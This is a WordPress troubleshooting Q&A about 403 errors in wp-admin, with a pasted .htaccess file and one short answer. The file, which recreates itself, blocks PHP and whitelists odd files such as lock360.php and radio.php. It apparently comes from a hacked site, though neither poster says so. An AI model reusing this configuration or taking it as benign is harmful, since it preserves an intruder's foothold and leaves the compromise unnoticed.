My site was running well last summer. But today when I tried to make updates in the wp-admin section, I got lots of 403 errors on all PHP files: load-styles, load-scripts, edit.php, media-new.php, etc… The interesting thing is that the front-end of my site has no problems.
Screenshot:
- I’ve read a few articles suggesting I disable plugins. I tried it, but it does not fix anything.
- Then I tried deleting my
.htaccessfile, and this does fix the wp-admin section, but it breaks the front-end, and now I get 403 errors on the homepage! It’s like I can only get one or the other. After about 5 minutes, WordPress automatically creates a new.htaccessfile, and we’re back to square one.
What permissions and settings should I set on .htaccess so I can run both my front-end and wp-admin sections without 403 Forbidden errors? This is what it looks like now:
<FilesMatch ".(py|exe|php)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
Answers:
Thank you for visiting the Q&A section on Magenaut. Please note that all the answers may not help you solve the issue immediately. So please treat them as advisements. If you found the post helpful (or not), leave a comment & I’ll get back to you as soon as possible.
Method 1
You appear to be denying access to PHP files, which would explain why you are denied access to PHP files:
<FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch>
What is the purpose of this?
All methods was sourced from stackoverflow.com or stackexchange.com, is licensed under cc by-sa 2.5, cc by-sa 3.0 and cc by-sa 4.0